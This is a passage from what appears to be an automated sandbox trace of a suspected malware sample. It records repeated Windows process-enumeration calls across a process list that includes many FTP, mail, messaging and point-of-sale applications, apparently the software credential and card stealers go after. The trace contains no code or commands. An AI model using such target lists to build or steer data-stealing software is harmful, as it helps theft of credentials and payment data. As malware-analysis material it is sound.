lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending_windsor_bouquet.exe")) returned 1 [0160.231] lstrlenW (lpString="pending_windsor_bouquet.exe") returned 27 [0160.231] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers.exe")) returned 1 [0160.232] lstrlenW (lpString="workers.exe") returned 11 [0160.232] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x520, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="succeed.exe")) returned 1 [0160.232] lstrlenW (lpString="succeed.exe") returned 11 [0160.232] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="washer jar.exe")) returned 1 [0160.233] lstrlenW (lpString="washer jar.exe") returned 14 [0160.233] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights_attending_other.exe")) returned 1 [0160.233] lstrlenW (lpString="nights_attending_other.exe") returned 26 [0160.233] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="useful_courts.exe")) returned 1 [0160.234] lstrlenW (lpString="useful_courts.exe") returned 17 [0160.234] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="compounds spanish.exe")) returned 1 [0160.234] lstrlenW (lpString="compounds spanish.exe") returned 21 [0160.234] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="look-albuquerque-left.exe")) returned 1 [0160.235] lstrlenW (lpString="look-albuquerque-left.exe") returned 25 [0160.235] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="try.exe")) returned 1 [0160.235] lstrlenW (lpString="try.exe") returned 7 [0160.235] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="statuteide.exe")) returned 1 [0160.236] lstrlenW (lpString="statuteide.exe") returned 14 [0160.236] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0160.236] lstrlenW (lpString="invite.exe") returned 10 [0160.236] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="register voluntary fluid.exe")) returned 1 [0160.237] lstrlenW (lpString="register voluntary fluid.exe") returned 28 [0160.237] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="cope finances ringtones.exe")) returned 1 [0160.237] lstrlenW (lpString="cope finances ringtones.exe") returned 27 [0160.237] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="modules_recommend.exe")) returned 1 [0160.238] lstrlenW (lpString="modules_recommend.exe") returned 21 [0160.238] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazinedeletecomparisons.exe")) returned 1 [0160.238] lstrlenW (lpString="magazinedeletecomparisons.exe") returned 29 [0160.238] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.239] lstrlenW (lpString="svchost.exe") returned 11 [0160.239] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0160.240] lstrlenW (lpString="3dftp.exe") returned 9 [0160.240] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0160.240] lstrlenW (lpString="absolutetelnet.exe") returned 18 [0160.240] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0160.241] lstrlenW (lpString="alftp.exe") returned 9 [0160.241] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0160.241] lstrlenW (lpString="barca.exe") returned 9 [0160.241] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0160.242] lstrlenW (lpString="bitkinex.exe") returned 12 [0160.242] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0160.243] lstrlenW (lpString="coreftp.exe") returned 11 [0160.243] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0160.244] lstrlenW (lpString="far.exe") returned 7 [0160.244] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0160.245] lstrlenW (lpString="filezilla.exe") returned 13 [0160.245] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0160.246] lstrlenW (lpString="flashfxp.exe") returned 12 [0160.246] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0160.246] lstrlenW (lpString="fling.exe") returned 9 [0160.247] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0160.247] lstrlenW (lpString="foxmailincmail.exe") returned 18 [0160.247] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0160.248] lstrlenW (lpString="gmailnotifierpro.exe") returned 20 [0160.248] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0160.249] lstrlenW (lpString="icq.exe") returned 7 [0160.249] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0160.250] lstrlenW (lpString="leechftp.exe") returned 12 [0160.250] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0160.251] lstrlenW (lpString="ncftp.exe") returned 9 [0160.251] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0160.252] lstrlenW (lpString="notepad.exe") returned 11 [0160.252] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0160.252] lstrlenW (lpString="operamail.exe") returned 13 [0160.252] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0160.253] lstrlenW (lpString="pidgin.exe") returned 10 [0160.253] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0160.254] lstrlenW (lpString="scriptftp.exe") returned 13 [0160.254] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0160.255] lstrlenW (lpString="skype.exe") returned 9 [0160.266] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0160.267] lstrlenW (lpString="smartftp.exe") returned 12 [0160.267] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0160.268] lstrlenW (lpString="thunderbird.exe") returned 15 [0160.268] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0160.269] lstrlenW (lpString="totalcmd.exe") returned 12 [0160.269] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0160.270] lstrlenW (lpString="trillian.exe") returned 12 [0160.270] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0160.270] lstrlenW (lpString="webdrive.exe") returned 12 [0160.270] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0160.271] lstrlenW (lpString="whatsapp.exe") returned 12 [0160.271] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0160.272] lstrlenW (lpString="winscp.exe") returned 10 [0160.272] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0160.273] lstrlenW (lpString="yahoomessenger.exe") returned 18 [0160.273] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0160.274] lstrlenW (lpString="active-charge.exe") returned 17 [0160.274] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0160.275] lstrlenW (lpString="accupos.exe") returned 11 [0160.275] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0160.275] lstrlenW (lpString="afr38.exe") returned 9 [0160.275] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0160.276] lstrlenW (lpString="aldelo.exe") returned 10 [0160.276] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0160.277] lstrlenW (lpString="ccv_server.exe") returned 14 [0160.277] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0160.277] lstrlenW (lpString="centralcreditcard.exe") returned 21 [0160.278] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xee8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0160.278] lstrlenW (lpString="creditservice.exe") returned 17 [0160.278] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0160.279] lstrlenW (lpString="edcsvr.exe") returned 10 [0160.279] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0160.280] lstrlenW (lpString="fpos.exe") returned 8 [0160.280] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0160.280] lstrlenW (lpString="isspos.exe") returned 10 [0160.280] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0160.281] lstrlenW (lpString="mxslipstream.exe") returned 16 [0160.281] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1010, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0160.282] lstrlenW (lpString="omnipos.exe") returned 11 [0160.282] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1024, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0160.282] lstrlenW (lpString="spcwin.exe") returned 10 [0160.282] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0160.283] lstrlenW (lpString="spgagentservice.exe") returned 19 [0160.283] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0160.284] lstrlenW (lpString="utg2.exe") returned 8 [0160.284] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1060, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_community.exe")) returned 1 [0160.284] lstrlenW (lpString="lb_community.exe") returned 16 [0160.284] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="miniature.exe")) returned 1 [0160.285] lstrlenW (lpString="miniature.exe") returned 13 [0160.285] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="humanity-volumes-enables.exe")) returned 1 [0160.286] lstrlenW (lpString="humanity-volumes-enables.exe") returned 28 [0160.286] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operation-environments.exe")) returned 1 [0160.286] lstrlenW (lpString="operation-environments.exe") returned 26 [0160.286] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0160.287] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0160.287] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0160.288] lstrlenW (lpString="taskhostw.exe") returned 13 [0160.288] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0160.288] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0160.288] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0160.289] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0160.289] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x12b0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0160.289] lstrlenW (lpString="conhost.exe") returned 11 [0160.289] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0160.290] lstrlenW (lpString="sppsvc.exe") returned 10 [0160.290] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0160.290] lstrlenW (lpString="dllhost.exe") returned 11 [0160.291] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0160.291] lstrlenW (lpString="wdgmug.exe") returned 10 [0160.291] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: 